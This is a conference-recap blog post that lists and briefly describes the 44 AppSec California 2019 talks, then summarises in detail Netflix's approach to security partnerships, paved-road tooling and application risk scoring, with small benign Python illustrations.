What I Learned Watching All 44 AppSec Cali 2019 Talks


OWASP AppSec California is one of my favorite security conferences: the talks are great, attendees are friendly, and it takes place right next to the beach in Santa Monica. Not too shabby 😎

One problem I always have, though, is that there are some great talks on the schedule that I end up missing.

So this year I decided to go back and watch all 44 talks from last year’s con, AppSec Cali 2019, and write a detailed summary of their key points.

If I had realized how much time and effort this was going to be at the beginning I probably wouldn’t have done it, but by the time I realized that this endeavor would take hundreds of hours, I was already too deep into it to quit 😅

Attending AppSec Cali 2020
If you’re attending AppSec Cali this year come say hi! I’m giving a talk and would be happy to chat about all things security.

What’s in this Post

This post is structured as follows:

  • Stats: Some high-level stats and trends: which talk categories were most popular? Which companies gave the most talks?
  • Overview of Talks: A quick rundown of every talk in a few lines each, so you can quickly skim them and find the talks that are most directly relevant to you.
  • Summaries: detailed summaries of each talk, grouped by category.

Note the navigation bar on the left hand side, which will enable you to quickly jump to any talk.

Feedback Welcomed!
If you’re one of the speakers and I’ve left out something important, please let me know! I’m happy to update this. Also, feel free to let me know about any spelling or grammar errors or broken links.

If you find DevSecOps / scaling really interesting, I’d love to chat about what you do at your company / any tips and tricks you’ve found useful. Hit me up on Twitter, LinkedIn, or email.

Stats

In total, AppSec Cali 2019 had 44 talks that were a combined ~31.5 hours of video.

Here are the talks grouped by the category that I believed was most fitting:

Stats: Talks by Category
Not too much of a surprise here: you’d expect defense (blue team) and web security talks to be emphasized at an OWASP conference.

We can also see that containers and Kubernetes were fairly popular topics (3).

Some things I found surprising were how many talks there were on threat modeling (4) and account security (4), and how there were only 3 primarily cloud security-focused talks. Perhaps the biggest surprise was that there were 3 talks on securing third-party code, with Slack discussing the steps they took to evaluate Slack bots and Salesforce discussing the review process on their AppExchange.

Stats: Talks by Company

Here we see Netflix crushing it: they had a presence on a panel, gave one of the keynotes, and collectively had 3 other talks. And of these 5 talks, 3 made my top 10 list. Not too shabby 👍

In second place, we see Segment coming in strong!

Netflix, Segment, and Dropbox were on at least one panel, while the rest of the companies listed had separate talks.



Overview of Talks

For your ease of navigation, this section groups all of the talks by category, gives a high-level description of what they’re about, and provides a link to jump right to their summary.

Note: the talks in each category are listed in alphabetical order, not in my order of preference.

My Top 10 Talks

This section lists my top 10 favorite talks from AppSec Cali 2019 ❤️

It was incredibly difficult narrowing it down to just 10, as there were so many good talks. All of these talks were selected because they are information-dense with detailed, actionable insights. I guarantee you’ll learn something useful from them.

A Pragmatic Approach for Internal Security Partnerships
Scott Behrens, Senior AppSec Engineer, Netflix
Esha Kanekar, Senior Security Technical Program Manager, Netflix
How the Netflix AppSec team scales their security efforts via secure defaults, tooling, automation, and long term relationships with engineering teams.

A Seat at the Table
Adam Shostack, President, Shostack & Associates
By having a “seat at the table” during the early phases of software development, the security team can more effectively influence its design. Adam describes how security can earn its seat at the table by using the right tools, adapting to what’s needed by the current project, and the soft skills that will increase your likelihood of success.

Cyber Insurance: A Primer for Infosec
Nicole Becher, Director of Information Security & Risk Management, S&P Global Platts
A lovely jaunt through the history of the insurance industry, the insurance industry today (terminology you need to know, types of players), where cyber insurance is today and where it’s headed, example cyber insurance policies and what you need to look out for.

(in)Secure Development - Why some product teams are great and others aren’t…
Koen Hendrix, InfoSec Dev Manager, Riot Games
Koen describes analyzing the security maturity of Riot product teams, measuring that maturity’s impact quantitatively using bug bounty data, and discusses 1 lightweight prompt that can be added into the sprint planning process to prime developers about security.

Lessons Learned from the DevSecOps Trenches
Clint Gibler, Research Director, NCC Group
Dev Akhawe, Director of Security Engineering, Dropbox
Doug DePerry, Director of Product Security, Datadog
Divya Dwarakanath, Security Engineering Manager, Snap
John Heasman, Deputy CISO, DocuSign
Astha Singhal, AppSec Engineering Manager, Netflix
Learn how Netflix, Dropbox, Datadog, Snap, and DocuSign think about security. A masterclass in DevSecOps and modern AppSec best practices.

Netflix’s Layered Approach to Reducing Risk of Credential Compromise
Will Bengston, Senior Security Engineer, Netflix
Travis McPeak, Senior Security Engineer, Netflix
An overview of efforts Netflix has undertaken to scale their cloud security, including segmenting their environment, removing static keys, auto-least privilege of AWS permissions, extensive tooling for dev UX (e.g. using AWS credentials), anomaly detection, preventing AWS creds from being used off-instance, and some future plans.

Starting Strength for AppSec: What Mark Rippetoe can Teach You About Building AppSec Muscles
Fredrick “Flee” Lee, Head Of Information Security, Square
Excellent, practical and actionable guidance on building an AppSec program, from the fundamentals (code reviews, secure code training, threat modeling), to prioritizing your efforts, the appropriate use of automation, and common pitfalls to avoid.

The Call is Coming From Inside the House: Lessons in Securing Internal Apps
Hongyi Hu, Product Security Lead, Dropbox
A masterclass in the thought process behind and technical details of building scalable defenses; in this case, a proxy to protect heterogenous internal web applications.

Startup Security: Starting a Security Program at a Startup
Evan Johnson, Senior Security Engineer, Cloudflare
What it’s like being the first security hire at a startup, how to be successful (relationships, security culture, compromise and continuous improvement), what should inform your priorities, where to focus to make an immediate impact, and time sinks to avoid.

Working with Developers for Fun and Progress
Leif Dreizler, Senior AppSec Engineer, Segment
Resources that have influenced Segment’s security program (talks, books, and quotes), and practical, real-world tested advice on how to: build a security team and program, do effective security training, successfully implement a security vendor, and the value of temporarily embedding a security engineer in a dev team.

Account Security

Automated Account Takeover: The Rise of Single Request Attacks
Kevin Gosschalk, Founder and CEO, Arkose Labs
Defines “single request attacks,” describes challenges of preventing account takeovers, gives examples of the types of systems bots attack in the wild and how, and recommendations for preventing account takeovers.

Browser fingerprints for a more secure web
Julien Sobrier, Lead Security Product Owner, Salesforce
Ping Yan, Research Scientist, Salesforce
How Salesforce uses browser fingerprinting to protect users from having their accounts compromised. Their goal is to detect sessions being stolen, including by malware running on the same device as the victim (and thus has the same IP address).

Contact Center Authentication
Kelley Robinson, Dev Advocate, Account Security, Twilio
Kelley describes her experiences calling in to 30 different companies’ call centers: what info they requested to authenticate her, what they did well, what they did poorly, and recommendations for designing more secure call center authentication protocols.

Leveraging Users’ Engagement to Improve Account Security
Amine Kamel, Head of Security, Pinterest
Pinterest describes how it protects users who have had their credentials leaked in third-party breaches using a combination of programmatic and user-driven actions.

Blue Team

CISO Panel: Baking Security Into the SDLC
Richard Greenberg, Global Board of Directors, OWASP
Coleen Coolidge, Head of Security, Segment
Martin Mazor, Senior VP and CISO, Entertainment Partners
Bruce Phillips, SVP & CISO, Williston Financial
Shyama Rose, Chief Information Security Officer, Avant
Five CISOs share their perspectives on baking security into the SDLC, DevSecOps, security testing (DAST/SAST/bug bounty/pen testing), security training and more.

It depends…
Kristen Pascale, Principal Techn. Program Manager, Dell EMC
Tania Ward, Consultant Program Manager, Dell
What a PSIRT team is, Dell’s PSIRT team’s workflow, common challenges, and how PSIRT teams can work earlier in the SDLC with development teams to develop more secure applications.

On the Frontlines: Securing a Major Cryptocurrency Exchange
Neil Smithline, Security Architect, Circle
Neil provides an overview of cryptocurrencies and cryptocurrency exchanges, the attacks exchanges face at the application layer, on wallets, user accounts, and on the currencies themselves, as well as the defenses they’ve put in place to mitigate them.

The Art of Vulnerability Management
Alexandra Nassar, Senior Technical Program Manager, Medallia
Harshil Parikh, Director of Security, Medallia
How to create a positive vulnerability management culture and process that works for engineers and the security team.

Cloud Security

Cloud Forensics: Putting The Bits Back Together
Brandon Sherman, Cloud Security Tech Lead, Twilio
An experiment in AWS forensics (e.g. Does the EBS volume type or instance type matter when recovering data?), advice on chain of custody and cloud security best practices.

Detecting Credential Compromise in AWS
Will Bengston, Senior Security Engineer, Netflix
How to detect when your AWS instance credentials have been compromised and are used outside of your environment, and how to prevent them from being stolen in the first place.

Containers / Kubernetes

Authorization in the Micro Services World with Kubernetes, ISTIO and Open Policy Agent
Sitaraman Lakshminarayanan, Senior Security Architect, Pure Storage
The history of authz implementation approaches, the value of externalizing authz from code, authz in Kubernetes, and the power of using Open Policy Agent (OPA) for authz with Kubernetes and ISTIO.

Can Kubernetes Keep a Secret?
Omer Levi Hevroni, DevSecOps Engineer, Soluto
Omer describes his quest to find a secrets management solution that supports GitOps workflows, is Kubernetes native, and has strong security properties, which led to the development of a new tool, Kamus.

How to Lose a Container in 10 Minutes
Sarah Young, Azure Security Architect, Microsoft
Container and Kubernetes best practices, insecure defaults to watch out for, and what happens when you do everything wrong and make your container or cluster publicly available on the Internet.

Keynotes

Fail, Learn, Fix
Bryan Payne, Director of Engineering, Product & Application Security, Netflix
A discussion of the history and evolution of the electrical, computer, and security industries, and how the way forward for security is a) sharing knowledge and failures and b) creating standard security patterns that devs can easily apply, raising the security bar at many companies, rather than improvements helping just one company.

How to Slay a Dragon
Adrienne Porter Felt, Chrome Engineer & Manager, Google
Solving hard security problems in the real world usually requires making tough tradeoffs. Adrienne gives 3 steps to tackle these hard problems and gives examples from her work on the Chrome security team, including site isolation, Chrome security indicators (HTTP/s padlock icons), and displaying URLs.

The Unabridged History of Application Security
Jim Manico, Founder, Manicode Security
Jim gives a fun and engaging history of computer security, including the history of security testing, OWASP projects, and XSS, important dates in AppSec, and the future of AppSec.

Misc

How to Start a Cyber War: Lessons from Brussels-EU Cyber Warfare Exercises
Christina Kubecka, CEO, HypaSec
Lessons learned from running EU diplomats through several realistic cyber warfare-type scenarios, and a fascinating discussion of the interactions between technology, computer security, economics, and geopolitics.

Securing Third-Party Code

Behind the Scenes: Securing In-House Execution of Unsafe Third-Party Executables
Mukul Khullar, Staff Security Engineer, LinkedIn
Best practices for securely running unsafe third-party executables: understand and profile the application, harden your application (input validation, examine magic bytes), secure the processing pipeline (sandboxing, secure network design).

Securing Third Party Applications at Scale
Ryan Flood, Manager of ProdSec, Salesforce
Prashanth Kannan, Product Security Engineer, Salesforce
The process, methodology, and tools Salesforce uses to secure third-party apps on its AppExchange.

Slack App Security: Securing your Workspaces from a Bot Uprising
Kelly Ann, Security Engineer, Slack
Nikki Brandt, Staff Security Engineer, Slack
An overview of the fundamental challenges in securing Slack apps and the App Directory, the steps Slack is taking now, and what Slack is planning to do in the future.

Security Tooling

BoMs Away - Why Everyone Should Have a BoM
Steve Springett, Senior Security Architect, ServiceNow
Steve describes the various use cases of a software bill-of-materials (BOM), including facilitating accurate vulnerability and other supply-chain risk analysis, and gives a demo of OWASP Dependency-Track, an open source supply chain component analysis platform.

Endpoint Finder: A static analysis tool to find web endpoints
Olivier Arteau, Desjardins
A new tool to extract endpoints defined in JavaScript by analyzing its Abstract Syntax Tree.

Pose a Threat: How Perceptual Analysis Helps Bug Hunters
Rob Ragan, Partner, Bishop Fox
Oscar Salazar, Managing Security Associate, Bishop Fox
How to get faster, more complete external attack surface coverage by automatically clustering exposed web apps by visual similarity.

The White Hat’s Advantage: Open-source OWASP tools to aid in penetration testing coverage
Vincent Hopson, Field Applications Engineer, CodeDx
How two OWASP tools can make penetration testers more effective and demos using them. Attack Surface Detector extracts web app routes using static analysis and Code Pulse instruments Java or .NET apps to show your testing coverage.

Usable Security Tooling - Creating Accessible Security Testing with ZAP
David Scrobonia, Security Engineer, Segment
An overview and demo of ZAP’s new heads-up display (HUD), an intuitive and awesome way to view OWASP ZAP info and use ZAP functionality from within your browser on the page you’re testing.

Threat Modeling

Game On! Adding Privacy to Threat Modeling
Adam Shostack, President, Shostack & Associates
Mark Vinkovits, Manager, AppSec, LogMeIn
Adam Shostack and Mark Vinkovits describe the Elevation of Privilege card game, built to make learning and doing threat modelling fun, and how it’s been extended to include privacy.

Offensive Threat Models Against the Supply Chain
Tony UcedaVelez, CEO, VerSprite
The economic and geopolitical impacts of supply chain attacks, a walkthrough of supply chain threat modeling from a manufacturer’s perspective, and tips and best practices in threat modeling your supply chain.

Threat Model Every Story: Practical Continuous Threat Modeling Work for Your Team
Izar Tarandach, Lead Product Security Architect, Autodesk
Attributes required by threat modelling approaches in order to succeed in Agile dev environments, how to build an organization that continuously threat models new stories, how to educate devs and raise security awareness, and PyTM, a tool that lets you express TMs via Python code and output data flow diagrams, sequence diagrams, and reports.

Web Security

An Attacker’s View of Serverless and GraphQL Apps
Abhay Bhargav, CTO, we45
An overview of functions-as-a-service (FaaS) and GraphQL, relevant security considerations and attacks, and a number of demos.

Building Cloud-Native Security for Apps and APIs with NGINX
Stepan Ilyin, Co-founder, Wallarm
How NGINX modules and other tools can be combined to give you a nice dashboard of live malicious traffic, send automatic alerts, block attacks and likely bots, and more.

Cache Me If You Can: Messing with Web Caching
Louis Dion-Marcil, Information Security Analyst, Mandiant
Three web cache related attacks are discussed in detail: cache deception, edge side includes, and cache poisoning.

Inducing Amnesia in Browsers: the Clear Site Data Header
Caleb Queern, Cyber Security Services Director, KPMG
Websites can use the new Clear-Site-Data HTTP header to control the data their users store in their browsers.

Node.js and NPM Ecosystem: What are the Security Stakes?
Vladimir de Turckheim, Software Engineer, Sqreen
JavaScript vulnerability examples (SQLi, ReDoS, object injection), ecosystem attacks (e.g. ESLint backdoored), best practice recommendations.

Preventing Mobile App and API Abuse
Skip Hovsmith, Principal Engineer, CriticalBlue
An overview of the mobile and API security cat and mouse game (securely storing secrets, TLS, cert pinning, bypassing protections via decompiling apps and hooking key functionality, OAuth2, etc.), described through an example back and forth between a package delivery service company and an attacker-run website trying to exploit it.



Phew, that was a lot. Let’s get into it!



My Top 10 Talks

A Pragmatic Approach for Internal Security Partnerships

Scott Behrens, Senior AppSec Engineer, Netflix
Esha Kanekar, Senior Security Technical Program Manager, Netflix
abstract slides video

How the Netflix AppSec team scales their security efforts via secure defaults, tooling, automation, and long term relationships with engineering teams.

Check Out This Talk
This is one of the best talks I’ve seen in the past few years on building a scalable, effective AppSec program that systematically raises a company’s security bar and reduces risk over time. Highly, highly recommended 💯

The Early Days of Security at Netflix

In the beginning, the Netflix AppSec team would pick a random application, find a bunch of bugs in it, write up a report, then kick it over the wall to the relevant engineering manager and ask them to fix it. Their reports had no strategic recommendation section, just a list of boilerplate recommendations/impact/description of vulns. Essentially, they were operating like an internal security consulting shop.

This approach was not effective - vulns often wouldn’t get fixed and the way they operated caused relationships with dev teams to be adversarial and transactional. They were failing to build long term relationships with product and application teams. They were focusing on fixing individual bugs rather than strategic security improvements.

Further, dev teams would receive “high priority” requests from different security teams within Netflix, which was frustrating: it was unclear to them how to prioritize the security asks relative to one another, and the amount of work was intractable.

Enabling Security via Internal Strategic Partnership

Now, the AppSec team aims to build strong, long term trust-based relationships with dev teams.

They work closely with app and product teams to assess their security posture and to identify and document investment areas: strategic initiatives that may take a few quarters, rather than just giving dev teams a list of vulns.

Security Paved Road

The Netflix AppSec team invests heavily in building a security paved road: a set of libraries, tools, and self-service applications that enable developers to be both more productive and more secure.

For example, the standard authentication library is not only hardened, but it also is easy to debug and use, has great logging and gives devs (and security) insight into who’s using their app, and in general enables better support of customers who are having issues, whether it’s security related or not.

As part of our Security Paved Road framework, we focus primarily on providing security assurances and less on vulns.

Tooling and Automation

The Netflix AppSec team uses tooling and automation in vuln identification and management as well as application inventory and risk classification.

This information gives them valuable data and context, for example, to inform the conversation when they’re meeting with a dev team, as they’ll understand the app’s risk context, purpose, etc. and be able to make better recommendations.

Intuition and organizational context are still used though. They’re data informed, not solely data driven.

Netflix’s 5-Step Approach to Partnerships


1. Engagement identification

  • Identify areas of investment based on factors like enterprise risk, business criticality, sensitivity of data being handled, bug bounty submission volume, overall engineering impact on the Netflix ecosystem, etc.
  • Ensure that the application team is willing to partner.

2. Discovery meeting(s)

  • Basically a kick off and deep dive meeting with the app team.
  • What are some of their security concerns? What keeps them up at night?
  • Set context with stakeholders: we’re identifying a shared goal, not forcing them to a pre-chosen security bar.
  • Make sure security team’s understanding of the app built via automation aligns with what the dev team thinks.

3. Security review

  • Based on info collected via automation and meeting with the dev team, the security team now knows what security services should be performed on which app and part of their landscape.
    • You don’t need to pen test or do a deep threat model of every app. This process can be more holistic, sometimes over a set of apps rather than a specific one.
  • Work with other security teams to collect their security asks for the dev team. This full list of security asks is then prioritized by the security team and consolidated into a single security initiatives document.

4. Alignment on the Security Initiatives Doc

  • Discuss the security initiatives document with the dev team to ensure there is alignment on the asks and their associated priorities.

5. On-going relationship management and sync-ups

  • After aligning on the security asks, the dev teams make the initiatives part of their roadmap.
  • The sync-ups are the key to maintaining the long term relationship with partnering teams. Meetings may be bi-weekly or monthly and the security point of contact may join their all-hands, quarterly meeting plans, etc.
  • These meetings are not just to track that the security initiatives are on the app team’s roadmap, but also to ask if they have any blockers, questions, or concerns the security team can help with.
  • What’s going on in their world? What new things are coming up?

Automation Overview

Before going through a case study of this partnership process, let’s quickly cover some of the tooling and automation that enables Netflix’s AppSec team to scale their efforts.

Application Risk Rating: Penguin Shortbread

Penguin Shortbread performs an automated risk calculation for various entities. For example, it can:

  • Find all apps that have running instances and are Internet accessible, by org.
  • Show which apps are using security controls, like SSO, app-to-app mTLS, and secrets storage, and whether they’ve filled out the security questionnaire (Zoltar).

This allows the security team to walk into a meeting and celebrate the team’s wins: “Hey, it looks like all of your high risk apps are using SSO, that’s great. You could buy down your risk even further by implementing secret storage in these other apps.”
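To make this kind of report concrete, here is a minimal sketch in Python. It is not Netflix’s implementation: the `App` record, the control names (`sso`, `mtls`, `secrets`), and the sample apps are all hypothetical, chosen only to mirror the properties mentioned above.

```python
from dataclasses import dataclass, field


@dataclass
class App:
    # Hypothetical record; field names are assumptions for illustration.
    name: str
    org: str
    internet_facing: bool
    running_instances: int
    controls: set = field(default_factory=set)  # e.g. {"sso", "mtls", "secrets"}


def exposed_apps_by_org(apps):
    """Group apps that have running instances and are Internet accessible, by org."""
    by_org = {}
    for app in apps:
        if app.internet_facing and app.running_instances > 0:
            by_org.setdefault(app.org, []).append(app)
    return by_org


def missing_control(apps, control):
    """Return the names of apps that have not adopted the given control."""
    return sorted(a.name for a in apps if control not in a.controls)


apps = [
    App("player-api", "content-eng", True, 12, {"sso", "mtls", "secrets"}),
    App("asset-upload", "content-eng", True, 3, {"sso"}),
    App("batch-encoder", "content-eng", False, 40, {"mtls"}),
    App("old-dashboard", "studio", True, 0, set()),  # no running instances
]

exposed = exposed_apps_by_org(apps)
for org, org_apps in exposed.items():
    print(org, "missing SSO:", missing_control(org_apps, "sso"))
    print(org, "missing secrets storage:", missing_control(org_apps, "secrets"))
```

With this sample data, every exposed app in the org already uses SSO (the win to celebrate), while one still lacks secrets storage (the next thing to suggest).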

Application Risk Calculator

This gives a ballpark understanding of which apps the security team should probably look at first, based on properties like: is it Internet facing? Does it have an old OS or AMI? Which parts of the security paved road is it using? How many running instances are there? Is it running in a compliance-related AWS account like PCI?
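A ballpark score like this could be computed as a simple weighted sum over those properties. The sketch below is an assumption-heavy illustration: the talk does not give the actual weights or formula, so the `WEIGHTS` values, the control names, and the cap on instance count are all made up.

```python
# Hypothetical weights for illustration; the talk does not give actual values.
WEIGHTS = {
    "internet_facing": 40,
    "old_os_or_ami": 20,
    "compliance_account": 25,  # e.g. runs in a PCI-related AWS account
}
PAVED_ROAD_CONTROLS = ("sso", "mtls", "secrets")  # assumed control names
POINTS_PER_MISSING_CONTROL = 5


def risk_score(app: dict) -> int:
    """Return a rough risk score; higher means 'look at this app first'."""
    score = 0
    for prop, weight in WEIGHTS.items():
        if app.get(prop, False):
            score += weight
    adopted = set(app.get("paved_road", ()))
    missing = [c for c in PAVED_ROAD_CONTROLS if c not in adopted]
    score += POINTS_PER_MISSING_CONTROL * len(missing)
    # More running instances means a larger footprint; cap the contribution at 10.
    score += min(app.get("running_instances", 0), 10)
    return score


apps = [
    {"name": "public-signup", "internet_facing": True, "old_os_or_ami": True,
     "paved_road": ["sso"], "running_instances": 25},
    {"name": "internal-report", "paved_road": ["sso", "mtls", "secrets"],
     "running_instances": 2},
    {"name": "payments-gw", "internet_facing": True, "compliance_account": True,
     "paved_road": ["sso", "mtls", "secrets"], "running_instances": 6},
]

ranked = sorted(apps, key=risk_score, reverse=True)
for app in ranked:
    print(f"{app['name']:16} {risk_score(app)}")
```

The absolute numbers matter less than the ordering: the point is a cheap, automated first pass that tells the security team where to look first.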


Vulnerability Scanning: Scumblr

Scumblr was originally discussed by Netflix at AppSec USA 2016 (video) and was open sourced. It has since been changed heavily for internal use, and in general is used to run small, lightweight security checks against code bases or simple queries against running instances.


Security Guidance Questionnaire: Zoltar

Zoltar keeps track of the intended purpose for different apps and other aspects that are hard to capture automatically. As devs fill out the questionnaire, they’re given more tailored advice for the language and frameworks they’re using, enabling the dev team to focus on things that measurably buy down risk.


Case Study: Kicking Off a Partnership with the Content Engineering Team

Discovery Meeting Preparation: Understand Their World

The team they’re meeting with may have 100-150 apps. The security team uses automation to come to the meeting as informed as possible:

  • Risk scoring - Based on the data the apps handle, if they’re Internet facing, business criticality, etc.
  • Vulnerability history - From internal tools, bug bounty history, pen tests, etc.
  • Security guidance questionnaire - Questionnaire that the dev team fills out.

Discovery Meeting

The main point of the meeting is to build trust and show that the security team has done their homework. Instead of coming in and asking for a bunch of info, the security team is able to leverage their tooling and automation to come in knowing a lot about the dev team’s context - their apps, the risk factors they face, and the likely high risk apps they should focus on. This builds a lot of rapport.

If app teams aren’t receptive, that’s OK, the security team will circle back later.

Security Review

Perform holistic threat modeling/security services
This is different than a normal security review, as 100-200 apps may be in scope. They threat model a team’s ecosystem, not just a single app. Because the security team is informed of the team’s apps and risks, they can tailor the security help they provide and what they recommend.

What controls can they use to buy down their biggest risks?

By investing in secure defaults and self-service tooling, the security team can focus on things that add more value by digging into the harder problems, rather than walking in and saying, “You need to use X library, you need to scan with Y tool,” etc.

Collect and prioritize context/asks from other Security Teams
The various security teams align on which security asks they want the dev team to prioritize, so that the dev team doesn’t need to worry about the 6 - 12 security subteams.

Document the security asks into a security initiatives doc
Put all of the asks and related useful meta info into a standalone doc for easier tracking.

Align on the Security Initiatives Doc

According to Esha, this step is the secret weapon that helps make the whole process so effective. The doc includes:

  • Executive Summary: Focuses on the good as well as the bad. Threats, paved road adoption, open vulns, and an overview on the strategic work they should kick off first to mitigate the most risk.
  • Partnership Details: Provides context on when the meetings will be as well as the dev point of contact.
  • Team Details: Summary of the team, what they do, who to reach out to, documentation/architecture diagrams, and a list of known applications/libraries.
  • Security Initiatives Matrix: A prioritized list of security work (from all security teams). They set a high level objective for each goal and define its impact to Netflix.
    • They’ll provide the specific steps to reach that goal and include the priority, description, owner, status, timeline for delivery, and an option for tracking the work in Jira.
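As a rough illustration of the Security Initiatives Matrix, the sketch below models one row as a Python dataclass and consolidates asks from several security teams into a single prioritized list. The field names follow the attributes listed above; the `Priority` levels, the `consolidate` helper, the team names, and the sample asks are hypothetical.

```python
from dataclasses import dataclass
from enum import IntEnum


class Priority(IntEnum):
    # Assumed three-level scale; lower value sorts first.
    HIGH = 1
    MEDIUM = 2
    LOW = 3


@dataclass
class Initiative:
    objective: str
    impact: str
    priority: Priority
    owner: str
    status: str = "not started"
    timeline: str = ""
    tracking_ticket: str = ""  # optional, e.g. a Jira issue key
    requested_by: str = ""     # which security team raised the ask


def consolidate(asks_by_team):
    """Merge asks from all security teams into one list sorted by priority."""
    merged = []
    for team, asks in asks_by_team.items():
        for ask in asks:
            ask.requested_by = team
            merged.append(ask)
    return sorted(merged, key=lambda i: (i.priority, i.objective))


asks_by_team = {
    "appsec": [
        Initiative("Adopt paved road authentication",
                   "Removes custom auth code", Priority.HIGH, "content-eng"),
    ],
    "cloud-security": [
        Initiative("Move secrets into secrets storage",
                   "Removes static credentials", Priority.MEDIUM, "content-eng"),
        Initiative("Rebuild images on a current AMI",
                   "Removes known OS vulns", Priority.HIGH, "content-eng",
                   timeline="Q3"),
    ],
}

matrix = consolidate(asks_by_team)
for row in matrix:
    print(row.priority.name, "|", row.objective, "|", row.requested_by)
```

The dev team then sees one ordered list rather than separate requests from each security subteam.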

During the meeting, security emphasizes the goal: it’s not just about fixing bugs, it’s about setting a long term strategic path to reduce risk.

Example security initiatives document

On-going Syncs

During these syncs, the security team’s goals are to build trust and show value, as well as talk about upcoming work and projects the dev team has on their plate.

The security team member ensures work is getting prioritized quarter over quarter and helps the dev team get connected with the right team if they’re hitting roadblocks when working on the security asks.

Scaling Partnerships - Security Brain

Security brain is the customer facing version of all of the security tooling. It presents dev teams, in a single view, the risk automatically assigned to each app, the vulns currently open, and the most impactful security controls/best practices that should be implemented.

While other security tools present a broader variety of information and more detail, Security Brain is purposefully focused on just the biggest “need to know” items that dev teams should care about right now.


Risks With Our Security Approach

Netflix’s approach isn’t perfect:

  • There’s a heavy emphasis on the paved road, but not all apps use it, so they have limited visibility there.
  • The current automated risk scoring metrics are a bit arbitrary and could be improved.
  • They don’t yet have an easy way to push out notifications if there’s a new control they want existing partner teams to adopt.

Evolving AppSec at Netflix: In Progress

Asset Inventory

Asset Inventory provides a way to navigate and query relationships between disparate infrastructure data sources.

This includes not just code artifacts, but AWS accounts, IAM, load balancer info, and anything else related to an app, as well as ownership and team information.

The Netflix AppSec team is working on creating an authoritative application inventory, which will enable them to better measure security paved road adoption, improve their self-service model and validation of controls, and find where they don’t have visibility.
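One way to picture an application inventory is as a join across data sources keyed by app name, where apps that show up in one source but not another reveal visibility gaps. The sketch below assumes exactly that; the source names, attributes, and `build_inventory` helper are hypothetical and not taken from the talk.

```python
def build_inventory(*sources):
    """Merge (source_name, {app_name: attrs}) pairs into one record per app."""
    inventory = {}
    for source_name, records in sources:
        for app_name, attrs in records.items():
            entry = inventory.setdefault(app_name, {"sources": []})
            entry["sources"].append(source_name)
            entry.update(attrs)
    return inventory


# Hypothetical data sources, each keyed by application name.
code_repos = {
    "player-api": {"repo": "git/player-api"},
    "asset-upload": {"repo": "git/asset-upload"},
}
aws_accounts = {
    "player-api": {"aws_account": "prod"},
    "mystery-svc": {"aws_account": "test"},
}
ownership = {
    "player-api": {"owner": "content-eng"},
    "asset-upload": {"owner": "content-eng"},
}

inventory = build_inventory(
    ("code", code_repos),
    ("aws", aws_accounts),
    ("ownership", ownership),
)

# Apps with no ownership info are a visibility gap worth chasing down.
unowned = sorted(name for name, entry in inventory.items() if "owner" not in entry)
print("No known owner:", unowned)
```

Here `mystery-svc` is running in AWS but has no repo or owner on record, which is the kind of blind spot an authoritative inventory is meant to surface.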


Prism

Prism builds on top of the asset inventory as a paved road measurement and validation risk scoring system. It will give them the ability to recommend, validate, and measure paved road adoption practices prioritized by application risks and needs.

Prism will enable the security team to quickly ask questions like, “OK, this team has some apps that access PII. Do they have any apps without logging? Show me all of their apps written in Java.”
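Questions like these amount to attribute filters over the inventory. The following sketch shows the idea with a tiny `query` helper; the helper, the attribute names, and the sample apps are assumptions for illustration and say nothing about how Prism is actually built.

```python
def query(apps, **conditions):
    """Return the apps whose attributes match every given condition."""
    return [
        app for app in apps
        if all(app.get(key) == value for key, value in conditions.items())
    ]


# Hypothetical inventory records for one team.
apps = [
    {"name": "billing-svc", "team": "payments", "language": "java",
     "accesses_pii": True, "logging": True},
    {"name": "receipt-mailer", "team": "payments", "language": "python",
     "accesses_pii": True, "logging": False},
    {"name": "rates-cache", "team": "payments", "language": "java",
     "accesses_pii": False, "logging": False},
]

# "Do they have any apps that access PII without logging?"
pii_without_logging = query(apps, team="payments", accesses_pii=True, logging=False)
print([a["name"] for a in pii_without_logging])

# "Show me all of their apps written in Java."
java_apps = query(apps, team="payments", language="java")
print([a["name"] for a in java_apps])
```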

Benefits of Prism include:

  • Faster IR response and triage time (can determine who owns an app quicker)
  • More mature risk calculation and scoring
  • Assist in scaling partnerships by increasing self servicing

We’ve discovered that focusing on the controls that buy down risk with automation is a lot easier than finding bugs with automation. That’s where we’re putting our emphasis right now.

Future Plans

Over time the Netflix AppSec team wants to grow investment in Secure by Default (Paved Road) efforts, as they tend to be high leverage, high impact, and excellent for devs - devs get a lot of value for free.

Not all security controls can be automated, so making self-service security easier to use is also valuable.

Security partnerships will always be valuable, as there are aspects and context that secure defaults and self-service tooling will never be able to handle. As more of the security team’s job is handled by widespread baseline security control adoption and self-service tooling, they’ll be able to provide even more value in their partnerships.

Stats: This Approach Works

The Netflix AppSec team reviewed all of the critical risk vulns they had over the past 3 years and this is what they found:

  • 20% could have lowered their risk to High if paved road authentication controls had been adopted.
  • 12% could have been prevented or detected with third-party vulnerability scanning (See Aladdin Almubayed’s BlackHat 2019 talk).
  • 32% would not have been found with automation or self-service, so security partnerships are an important tool to reduce risk.

They also found they used only 33% of their projected bug bounty spend, which they had set aside based on industry standards, so it appears that they are headed in the right direction.

Maturity Framework for Partnerships

Maturity Framework
Note that this is the maturity level of the security team’s partnership with the dev team, not the security maturity of the dev team

Quick Wins

Determine your application risk scoring model
How do you determine which apps are high vs low risk? Consider using factors like if they’re Internet facing, the sensitivity of the data they interact with, programming language used, and compliance requirements.
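As a rough illustration of what such a scoring model could look like, here is a small sketch that combines the factors listed above. The weights, the tier thresholds, and the `AppProfile` fields are assumptions made up for this example, not values from the talk; you would tune them to your own environment.

```python
from dataclasses import dataclass

# Hypothetical weights; tune these to your own environment.
DATA_SENSITIVITY_POINTS = {"public": 0, "internal": 1, "pii": 3, "payment": 4}
MEMORY_UNSAFE_LANGUAGES = {"C", "C++"}


@dataclass
class AppProfile:
    name: str
    internet_facing: bool
    data_sensitivity: str  # must be a key of DATA_SENSITIVITY_POINTS
    language: str
    in_compliance_scope: bool


def risk_score(app: AppProfile) -> int:
    """Add up points for each risk factor the app exhibits."""
    score = 0
    if app.internet_facing:
        score += 3
    score += DATA_SENSITIVITY_POINTS[app.data_sensitivity]
    if app.language in MEMORY_UNSAFE_LANGUAGES:
        score += 1
    if app.in_compliance_scope:
        score += 2
    return score


def risk_tier(score: int) -> str:
    """Bucket a numeric score into a coarse tier (thresholds are assumptions)."""
    if score >= 7:
        return "high"
    if score >= 4:
        return "medium"
    return "low"


checkout = AppProfile("checkout", True, "payment", "Java", True)
wiki = AppProfile("wiki", False, "internal", "Python", False)
print(checkout.name, risk_score(checkout), risk_tier(risk_score(checkout)))  # checkout 9 high
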